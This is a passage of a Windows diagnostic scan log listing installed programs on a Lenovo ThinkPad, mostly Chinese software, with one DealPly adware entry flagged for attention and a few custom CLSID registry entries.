Last.fm Scrobbler 2.1.35 (HKLM\...\LastFM_is1) (Version:  - Last.fm)
Lenovo Driver Update Control (HKLM\...\dueng) (Version:  - )
Lenovo Fingerprint Software (HKLM\...\{3D8994A3-02A8-45B5-B955-53E608BC69ED}) (Version: 3.2.0.341 - AuthenTec, Inc.)
Lenovo Welcome v1.0.24.3 (HKLM\...\Lenovo Welcome_is1) (Version:  - Lenovo)
LightScribe System Software  1.10.19.1 (HKLM\...\{59046D29-2E6B-4224-BF0D-64F3E7A93F7B}) (Version: 1.10.19.1 - http://www.lightscribe.com)
Magical Jelly Bean KeyFinder (HKLM\...\KeyFinder_is1) (Version: 2.0.8.2 - Magical Jelly Bean)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
MATLAB R2012a (HKLM\...\Matlab R2012a) (Version: 7.14 - The MathWorks, Inc.)
MemTest 4.0 (HKLM\...\MemTest) (Version: 4.0 - heat.ray(想oоО))
Message Center (HKLM\...\{E7E836B8-4BDD-454F-82E6-5FEA17C83AD4}) (Version: 2.01d - )
Message Center Plus (HKLM\...\{FD331A3B-F7A5-4C31-B8D4-DF413C85AF7A}) (Version: 2.0.0012.00 - Lenovo Group Limited)
Microsoft .NET Framework 3.5 Language Pack SP1 - chs (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 SP1 语言包 - 简体中文 (HKLM\...\Microsoft .NET Framework 3.5 Language Pack SP1 - chs) (Version:  - Microsoft Corporation)
Microsoft Application Error Reporting (Version: 12.0.6012.5000 - Microsoft Corporation) Hidden
Microsoft AppLocale (HKLM\...\{394BE3D9-7F57-4638-A8D1-1D88671913B7}) (Version: 1.0.0 - MS)
Microsoft Chart Controls for Microsoft .NET Framework 3.5 (KB2500170) (HKLM\...\{41785C66-90F2-40CE-8CB5-1C94BFC97280}) (Version: 3.5.30730.0 - Microsoft Corporation)
Microsoft Choice Guard (Version: 2.0.48.0 - Microsoft Corporation) Hidden
Microsoft Games for Windows - LIVE Redistributable (HKLM\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (Version:  - Microsoft) Hidden
Microsoft Office Access MUI (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office IME (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office IME (Chinese (Simplified)) 2010 (Version: 14.0.4999.3010 - Microsoft Corporation) Hidden
Microsoft Office IMESS (Chinese (Simplified)) 2010 (Version: 14.0.4999.3010 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Live Add-in 1.3 (HKLM\...\{57F0ED40-8F11-41AA-B926-4A66D0D1A9CC}) (Version: 2.0.2313.0 - Microsoft Corporation)
Microsoft Office Outlook MUI (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional Plus 2007 (HKLM\...\PROPLUS) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (Chinese (Simplified)) 2007 (Version: 12.0.4518.1016 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3) (Version:  - Microsoft) Hidden
Microsoft Office Publisher MUI (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (Chinese (Simplified)) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20125.0 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft VC80 Support DLLs (Version: 1.0.0 - McNeel & Associates) Hidden
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM\...\{86CE1746-9EFF-3C9C-8755-81EA8903AC34}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Windows Application Compatibility Database (HKLM\...\{deb7008b-681e-4a4a-8aae-cc833e8216ce}.sdb) (Version:  - )
Microsoft XML Parser (Version: 8.70.1104.04 - Microsoft Corporation) Hidden
Microsoft XML 分析程序 (Version: 8.70.1104.04 - Microsoft Corporation) Hidden
Microsoft XNA Framework Redistributable 3.1 (HKLM\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Mobile Broadband Connect (HKLM\...\{2FAAD1C5-2D9D-4EDB-BCD1-FF6573986439}) (Version: 3.1.3050 - Lenovo)
MSNLite (HKLM\...\MSNLite) (Version: 2.2 - )
MSVC80_x86_v2 (Version: 1.0.3.0 - Nokia) Hidden
MSVCRT (Version: 14.0.1468.721 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Nero 8 Essentials (HKLM\...\{8D3FF1C3-0677-4A01-952E-6C9667772052}) (Version: 8.10.353 - Nero AG)
neroxml (Version: 1.0.0 - Nero AG) Hidden
Nitro PDF Reader (HKLM\...\{2881063B-C58F-49EB-97FD-8BF58EC580F9}) (Version: 1.4.0.11 - Nitro PDF Software)
Nokia Connectivity Cable Driver (HKLM\...\{6869591A-7DD8-46D2-837F-57CBF7358955}) (Version: 7.1.22.0 - Nokia)
Nokia PC Suite (Version: 7.1.40.1 - Nokia) Hidden
O&O Defrag Professional (HKLM\...\{CE2F467B-D1D2-4236-B80F-3E6A657FB695}) (Version: 14.1.425 - O&O Software GmbH)
OGA Notifier 1.7.0105.14.0 (Version: 1.7.0105.14.0 - Microsoft Corporation) Hidden
On Screen Display (HKLM\...\OnScreenDisplay) (Version: 5.12.00 - )
OpenAL (HKLM\...\OpenAL) (Version:  - )
Opera 10.51 (HKLM\...\{05ADEEC8-BD58-43D9-A9E3-1F53B0DA117A}) (Version: 10.51 - Opera Software ASA)
Origin85 (HKLM\...\{E0E49070-F2C7-402A-9D36-C9B87CA2E09D}) (Version: 8.50.000 - OriginLab Corporation)
Origin85 (Version: 8.50.000 - OriginLab) Hidden
P2pSearcher (HKLM\...\{EEDA1F1A-6E61-46AF-B3E8-2747E168A9BB}) (Version: 1.0.0 - libertarians)
PC Connectivity Solution (HKLM\...\{6E0352EE-6F0D-4FBC-B1B8-4FF032C78BE0}) (Version: 9.44.0.3 - Nokia)
PDF Password Remover v3.0 (HKLM\...\PDF Password Remover v3.0_is1) (Version:  - VeryPDF.com Inc)
Pharos (HKLM\...\Pharos) (Version:  - )
photoWORKS (HKLM\...\{9E1DB4FA-C8CB-48C7-A941-5E0864B5567D}) (Version: 1.00.000 - )
Picasa 3 (HKLM\...\Picasa 3) (Version: 3.9 - Google, Inc.)
Pirates Of The Caribbean At Worlds End Screen Saver (HKLM\...\Pirates Of The Caribbean At Worlds End) (Version:  - )
PPTV网络电视 V2.7.0.0031 (HKLM\...\PPLive) (Version: 2.7.0 - PPLive Corporation)
Presentation Director (HKLM\...\{65706020-7B6F-41F2-8047-FC69579E386A}) (Version: 4.00a - )
Primo (Version: 1.00.0000 - Your Company Name) Hidden
Product Recovery Disc Burning Utility (HKLM\...\{FA62B4C2-6CFD-462F-9B59-68A730001AB3}) (Version: 1.0.0019.00 - Lenovo Group Limited)
Productivity Center Supplement for ThinkPad (HKLM\...\{D728E945-256D-4477-B377-6BBA693714AC}) (Version: 3.00b - )
PunkBuster Services (HKLM\...\PunkBusterSvc) (Version: 0.986 - Even Balance, Inc.)
PX Profile Update (Version: 1.00.1. - AMD) Hidden
QQ旋风4.7 (HKLM\...\QQ旋风) (Version: 4.7.769.400 - 腾讯科技(深圳)有限公司)
QQ游戏 (HKLM\...\QQ游戏) (Version: 3.3.1.1 - 腾讯公司)
QuickTime (HKLM\...\{57752979-A1C9-4C02-856B-FBB27AC4E02C}) (Version: 7.69.80.9 - Apple Inc.)
RaySource 2.2.0.1 (HKLM\...\RaySource) (Version: 2.2.0.1 - RaySource Group)
Registry patch to improve USB device detection on resume from sleep for Windows Vista (HKLM\...\{4AB5764A-3894-49A2-BAA8-C4665F74CD4C}) (Version: 1.01.0000 - Lenovo Group Limited)
Rescue and Recovery (HKLM\...\{7E4C16B8-8F76-4940-8505-98E93C00BF19}) (Version: 4.23.0020.00 - Lenovo Group Limited)
ResearchSoft Direct Export Helper (HKLM\...\ResearchSoft Direct Export Helper) (Version:  - )
Resident Evil Extinction Screen Saver (HKLM\...\Resident Evil Extinction) (Version:  - )
RICOH R5C83x/84x Flash Media Controller Driver Ver.3.54.02 (HKLM\...\{59F6A514-9813-47A3-948C-8A155460CC2A}) (Version: 3.54.02 - )
Roxio Update Manager (HKLM\...\{30465B6C-B53F-49A1-9EBA-A3F187AD502E}) (Version: 6.0.0 - Roxio)
Ruijie Supplicant v3.95 (HKLM\...\{FDB88DAF-8DA4-4226-855B-1D816F37AE58}) (Version:  - )
Runtime (Version: 1.00.0000 - Your Company Name) Hidden
SILKYPIX Developer Studio 4.0 English (HKLM\...\InstallShield_{C223200D-631A-4C8A-8049-44946BB93ACA}) (Version: 4 - Ichikawa Soft Laboratory)
SILKYPIX Developer Studio 4.0 English (Version: 4 - Ichikawa Soft Laboratory) Hidden
Skins (Version: 2010.0504.2152.37420 - ATI) Hidden
Sonic Icons for Lenovo (HKLM\...\{B334D9AE-1393-423E-97C0-3BDC3360E692}) (Version: 2.0.0 - Lenovo)
Spelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)
STK02N 2.3 (HKLM\...\{E42E07F5-5A90-4BA9-B55A-79FCF9EAF9B5}) (Version: 2.3 - Syntek)
Subtitle Workshop 2.51 (HKLM\...\Subtitle Workshop) (Version: 2.51 - URUsoft Inc.)
Surfing Protection (HKLM\...\IObit Surfing Protection_is1) (Version: 1.0 - IObit)
System Migration Assistant (HKLM\...\{8A4DB1CA-8206-4ADC-805C-66ACF1611DA3}) (Version: 6.00.0010 - Lenovo Group Limited.)
System Update (HKLM\...\{8675339C-128C-44DD-83BF-0A5D6ABD8297}) (Version: 3.14.0024 - Lenovo)
Tencent QQMail Plugin (HKLM\...\QQMailPlugin) (Version:  - )
The KMPlayer (remove only) (HKLM\...\The KMPlayer) (Version: 3.9.0.127 - PandoraTV)
ThinkPad Bluetooth with Enhanced Data Rate Software (HKLM\...\{9E9D49A4-1DF4-4138-B7DB-5D87A893088E}) (Version: 6.2.1.3100 - Broadcom Corporation)
ThinkPad EasyEject 实用程序 (HKLM\...\{1297C681-92D7-40EF-93BF-03F66EC5105C}) (Version: 2.36 - )
ThinkPad FullScreen Magnifier (HKLM\...\ThinkPad FullScreen Magnifier) (Version: 2.02 - )
ThinkPad Mobility Center Customization (HKLM\...\{90FABD40-E741-446F-839D-CEAE905D63BE}) (Version: 1.50.0000 - Lenovo)
ThinkPad Modem Adapter (HKLM\...\CNXT_MODEM_HDA_HSF) (Version: 7.73.00 - Conexant Systems)
ThinkPad Power Management Driver (HKLM\...\Power Management Driver) (Version: 1.64.00.00 - )
ThinkPad UltraNav Driver (HKLM\...\SynTPDeinstKey) (Version: 15.0.18.0 - )
ThinkPad Wireless LAN Adapter Software (HKLM\...\{9D3D2C60-A55F-4fed-B2B9-17394396DF01}) (Version: 1.00.0029.8 - REALTEK Semiconductor Corp.)
ThinkPad 电源管理器 (HKLM\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 2.33 - )
ThinkVantage Access Connections (HKLM\...\{4E2FA28A-2D17-41CC-AD11-12F428B2A273}) (Version: 5.85 - Lenovo)
ThinkVantage Active Protection System (HKLM\...\{46A84694-59EC-48F0-964C-7E76E9F8A2ED}) (Version: 1.75 - Lenovo)
ThinkVantage Productivity Center (HKLM\...\{CF5737AF-8550-4546-A69B-0EA9EF5A9B55}) (Version: 3.00b - )
ThinkVantage Status Gadget (HKLM\...\{9CECB23C-F4BC-4FDA-A306-E544A216176A}) (Version: 1.0.3022 - Lenovo)
ThinkVantage Technologies Welcome Message (Version: 1.20 - ) Hidden
Transformers Screensaver (HKLM\...\Transformers Screensaver) (Version:  - )
Ulead GIF Animator 5 TBYB (HKLM\...\{8AF3E926-ED59-11D4-A44B-0000E86D2305}) (Version:  - Ulead System)
UltraEdit-32 v14.00a (HKLM\...\UltraEdit_is1) (Version:  - IDM Computer Solutions, Inc.)
Unlocker 1.9.1 (HKLM\...\Unlocker) (Version: 1.9.1 - Cedrick Collomb)
unnm=Version Checker for Dealply (HKCU\...\DealPly) (Version:  - ) <==== ATTENTION
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 suites (KB2596620) 32-Bit Edition (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{A024FC7B-77DE-45DE-A058-1C049A17BFB3}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596660) 32-Bit Edition (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{620E77C0-CDFE-4C14-AAEB-830ABB65864C}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596802) 32-Bit Edition (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{525A4A44-8940-40AD-ABA0-14501199D2F0}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596848) 32-Bit Edition (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{8153EC80-C988-4336-8DAF-6D99C0D26E0C}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{E9A82945-BA29-4EE8-8F2A-2F49545E9CF2}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition (HKLM\...\{90120000-001A-0804-0000-0000000FF1CE}_PROPLUS_{E97580BE-C997-4428-A7A3-9AE01F85DDB4}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB2768024) 32-Bit Edition (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{F5F9C863-59A7-40CA-8D86-E27D6B1D2617}) (Version:  - Microsoft)
VCRedistSetup (Version: 1.0.0 - Nero AG) Hidden
Verizon Wireless BroadbandAccess Self Activation (HKLM\...\{3F963A06-7C18-4039-9789-9644B3266AE7}) (Version: 1.3.2 - Smith Micro Software, Inc.)
Vista优化大师 (HKLM\...\VistaMaster) (Version:  - )
Wallpapers (Version:  - ) Hidden
Winamp (HKLM\...\Winamp) (Version: 5.7 Beta - Nullsoft, Inc)
Winamp Detector Plug-in (HKCU\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
Windows Driver Package - Broadcom (BTHUSB) Bluetooth  (04/08/2010 6.3.5.430) (HKLM\...\2004BB9EB6CEA02846881BEF1F51C11F7A90C9D6) (Version: 04/08/2010 6.3.5.430 - Broadcom)
Windows Driver Package - Broadcom HIDClass  (07/28/2009 6.2.0.9800) (HKLM\...\BF20603967CFDCB2BBF91950E8A56DFBC5C833FE) (Version: 07/28/2009 6.2.0.9800 - Broadcom)
Windows Driver Package - Intel (e1yexpress) Net  (03/27/2008 9.50.14.0) (HKLM\...\F99AE16996813DC11238C1670F2BA73C22AE6EAE) (Version: 03/27/2008 9.50.14.0 - Intel)
Windows Driver Package - Intel (iaStor) hdc  (07/22/2008 8.2.4.1005) (HKLM\...\3A4BCF4FDC99FD1314C1765462A054093CDEF58B) (Version: 07/22/2008 8.2.4.1005 - Intel)
Windows Driver Package - Intel hdc  (02/20/2008 6.9.1.1001) (HKLM\...\0A7603E3091C168CDE422A2B3481A2F7D17D0954) (Version: 02/20/2008 6.9.1.1001 - Intel)
Windows Driver Package - Intel System  (01/30/2008 8.6.1.1001) (HKLM\...\5A4D4FF375E24E41AE5D2D907E67E0884BE2CAF4) (Version: 01/30/2008 8.6.1.1001 - Intel)
Windows Driver Package - Intel System  (02/20/2008 8.6.1.1002) (HKLM\...\432D918ED17EA51B73E8491A0369730C0076A292) (Version: 02/20/2008 8.6.1.1002 - Intel)
Windows Driver Package - Intel System  (02/20/2008 8.7.0.1007) (HKLM\...\513C7D1BF4530B30EC84716327E4D7E76810DCC5) (Version: 02/20/2008 8.7.0.1007 - Intel)
Windows Driver Package - Intel System  (09/15/2006 7.0.0.1011) (HKLM\...\E6CEFD9A59425A2A27E92572AB367B28C371D3D8) (Version: 09/15/2006 7.0.0.1011 - Intel)
Windows Driver Package - Intel USB  (02/05/2007 8.3.0.1011) (HKLM\...\464CE3922A214073AAEE00DEB23EA5C750AF8CE8) (Version: 02/05/2007 8.3.0.1011 - Intel)
Windows Driver Package - Lenovo 1.45 (02/18/2008 1.45) (HKLM\...\386CAF2F8306A2DD7EBAEAA5A86D98BE177DC951) (Version: 02/18/2008 1.45 - Lenovo)
Windows Driver Package - Ricoh Company MMC Host Controller (02/15/2008 6.00.03.05) (HKLM\...\1205965EF392C9B0D5A9BDB139035F058E76359E) (Version: 02/15/2008 6.00.03.05 - Ricoh Company)
Windows Driver Package - Ricoh Company MS Host Controller (07/30/2007 6.00.01.11) (HKLM\...\1A96FF9D9E5F19776E6749D8F6557FCC437EB294) (Version: 07/30/2007 6.00.01.11 - Ricoh Company)
Windows Driver Package - Ricoh Company xD Host Controller (07/30/2007 6.00.01.13) (HKLM\...\778DAA8FB0D52FC214BC306BBDC33E26ACAB6F44) (Version: 07/30/2007 6.00.01.13 - Ricoh Company)
Windows Live Call (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Communications Platform (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live Essentials (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (HKLM\...\{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Messenger (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows 驱动程序包 - AuthenTec Inc. (ATSwpWDF) Biometric  (10/02/2008 8.1.2.37) (HKLM\...\A4680BD43717441189C52EBF2C4FD6B182EE1101) (Version: 10/02/2008 8.1.2.37 - AuthenTec Inc.)
Windows 驱动程序包 - Intel (NETw5v32) net  (09/15/2009 13.0.0.107) (HKLM\...\B70F914A99859243D67068AC4C47C1534B976B64) (Version: 09/15/2009 13.0.0.107 - Intel)
Windows 驱动程序包 - Nokia Modem  (06/01/2009 7.01.0.4) (HKLM\...\8CDCFB95BB84DD9C0F88F22266A0CA86035E55BA) (Version: 06/01/2009 7.01.0.4 - Nokia)
Windows 驱动程序包 - Nokia Modem  (10/05/2009 4.2) (HKLM\...\05B59228C7E1C21DFBE89260F879BD95880548D8) (Version: 10/05/2009 4.2 - Nokia)
Windows 驱动程序包 - Nokia pccsmcfd  (08/22/2008 7.0.0.0) (HKLM\...\504244733D18C8F63FF584AEB290E3904E791693) (Version: 08/22/2008 7.0.0.0 - Nokia)
Windows 驱动程序包 - Ricoh Company (risdptsk) hdc  (07/07/2009 6.03.02.28) (HKLM\...\F597F15415C5724D6442F5FBD0664D520174E93F) (Version: 07/07/2009 6.03.02.28 - Ricoh Company)
Windows修复助手 1.18 UNICODE (HKLM\...\Windows修复助手_is1) (Version: 1.18 - 苹果然工作室)
WinISO 5.3 (HKLM\...\WinISO_is1) (Version:  - WinISO Computing Inc.)
WinRAR 压缩文件管理器 (HKLM\...\WinRAR archiver) (Version:  - )
Word to PDF Converter 3.0 (HKLM\...\Word to PDF Converter_is1) (Version:  - PDF-Convert, Inc.)
YY3.9 (HKCU\...\YY3.9) (Version: 3.11.1.0 - 多玩游戏网)
Zero Assumption Recovery Version 9 (HKLM\...\Zero Assumption Recovery_is1) (Version:  - )
阿里旺旺2010 正式版SP1 (HKLM\...\阿里旺旺2010 正式版SP1) (Version:  - 阿里巴巴(中国)有限公司)
百度软件中心助手 1.3.0.3 (HKLM\...\BaiduRJDownloader) (Version: 1.3.0.3 - Beijing baidu Netcom science and technology co.ltd)
百度云管家 (HKLM\...\百度云管家) (Version: 4.6.1 - 百度在线网络技术(北京)有限公司)
帮助中心 (HKLM\...\{986F64DC-FF15-449D-998F-EE3BCEC6666A}) (Version: 2.00h - )
电精2  (HKLM\...\电精2) (Version:  - 多特软件站)
飞速土豆 1.40.19.0 (HKLM\...\飞速土豆) (Version: 1.40.19.0 - 土豆网)
格调网精品Vista主题美化包 V1.0(完美装机版)  (HKLM\...\格调网精品Vista主题美化包 V1.0(完美装机版)) (Version:  - dzART)
格调网精品主题美化包  (HKLM\...\格调网精品主题美化包) (Version:  - dzART)
格调网明星主题之周杰伦三国无双  (HKLM\...\格调网明星主题之周杰伦三国无双) (Version:  - dzART)
光盘刻录大师  6.0 (HKLM\...\{E282A694-F6F9-46DC-AFA4-023EEF09708F}_is1) (Version: 6.0 - 北京锐动天地信息技术有限责任公司)
红蜻蜓抓图精灵 v2.08 build 20100101 (HKLM\...\红蜻蜓抓图精灵_is1) (Version: 2.08 build 20100101 - 非常软件(北京)工作室)
华为网盘 (HKLM\...\华为网盘Beta) (Version: Beta - 华为软件技术有限公司)
极速酷6 (HKLM\...\Ku6SpeedUpper) (Version:  - )
可牛急救箱 2.0 (HKLM\...\{F49B7E2B-0551-429C-B317-14B7D374D6EC}_is1) (Version:  - Conew Corporation.)
酷狗音乐2012 (HKLM\...\酷狗音乐2012) (Version: 7.3.14.9257 - 酷狗音乐)
酷我K歌 (HKLM\...\KwSing) (Version:  - 酷我科技)
联想驱动下载管理器 (HKCU\...\90c40edc90b67eca) (Version: 2.0.0.169 - 联想.中国)
美图秀秀 3.8.0  (HKLM\...\美图秀秀) (Version:  - 美图网)
木马清除大师防火墙2012 (HKLM\...\木马清除大师防火墻2012) (Version: V7.0 - Lofocus安全实验室)
千千静听 5.7正式版 (HKLM\...\TTPlayer) (Version: 5.7正式版 - Alen Soft)
秋无痕论坛精品主题美化包 for Vista 2008 v1.0 (HKLM\...\秋无痕论坛精品主题美化包 for Vista 2008 v1.0) (Version:  - )
驱动精灵 (HKLM\...\DriverGenius) (Version: 2012 SP5 - 驱动之家)
驱动人生2010 (HKLM\...\{3DE1D32B-29A9-4e53-A0C2-9522F199E094}_is1) (Version: 2.3 - 深圳市驱动人生软件技术有限公司)
拳皇(The King of Fighters) 97  (HKLM\...\拳皇(The King of Fighters) 97) (Version:  - 多特软件站)
人人极速相册 (HKLM\...\rralbum) (Version:  - )
人人网相册上传工具 (HKLM\...\人人网相册上传工具) (Version:  - )
闪游浏览器 (HKCU\...\SaaYaa) (Version:  - )
闪游浏览器 (HKCU\...\SaaYaa3) (Version: 3.2.5.0 - 软媒网络科技有限公司)
闪游浏览器 (HKLM\...\SaaYaa) (Version:  - )
射手影音播放器 (HKLM\...\SPlayer) (Version:  - )
搜狗拼音输入法 7.2正式版 (HKLM\...\Sogou Input) (Version: 7.2.0.2991 - Sogou.com)
腾讯QQ2013 (HKLM\...\{052CFB79-9D62-42E3-8A15-DE66C2C97C3E}) (Version: 1.95.7633.0 - 腾讯科技(深圳)有限公司)
腾讯TM2009 (HKLM\...\{260706D6-56D3-41E8-9183-DC4DF54B7F4B}) (Version: 1.41.1287.0 - 腾讯科技(深圳)有限公司)
微软拼音输入法 2010 (HKLM\...\IME14SS.2052) (Version: 14.0.5800.1000 - Microsoft Corporation)
虾歌 (HKLM\...\{658D2C4F-158A-46FB-8C96-B1C8F56DBBE9}) (Version: 1.0.0.7Unicode - 杭州缪斯客网络科技有限公司)
卸载 豆丁桌面 (HKLM\...\{4A4538E0-C9EA-4360-8977-17F11B11E505}_is1) (Version:  - 豆丁网)
迅雷VIP尊享版 (HKLM\...\thunder_is1) (Version:  - 迅雷网络技术有限公司)
英特尔® PROSet/无线 WiFi 软件 (HKLM\...\{3FE3D6A5-2F5E-4870-A3AC-D1D88E0B2797}) (Version: 14.2.0000 - 英特尔公司)
英特尔® 主动管理技术 (HKLM\...\MESOL) (Version:  - Intel Corporation)
僌儕乕僼僔儞僪儘乕儉 (HKLM\...\{AD9E5D61-0EBB-4472-8DA9-359560FB6988}}_is1) (Version:  - 墿崹僼儘儞僥傿傾)
影视搜索 (HKLM\...\影视搜索) (Version: 1.2.0 - Shenzhen Qvod Technology Co.,Ltd)
用于 Windows 的 PC-Doctor 5 (HKLM\...\PC-Doctor 5 for Windows) (Version: 5.1.4957.02 - PC-Doctor, Inc.)
优酷客户端 (HKLM\...\YoukuClient) (Version: 3.7.0.12271 - youku, Inc.)
有道词典 (HKLM\...\有道词典) (Version: 4.3 - 网易公司)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\localserver32 -> c:\users\think\appdata\roaming\saayaa\saayaa.exe (RuanMei.com)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\THINK\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{0507EEDE-3AE7-49c7-BF37-0EB4A62D8638}\localserver32 -> C:\Program Files\Google\Google Talk\googletalk.exe (Google)
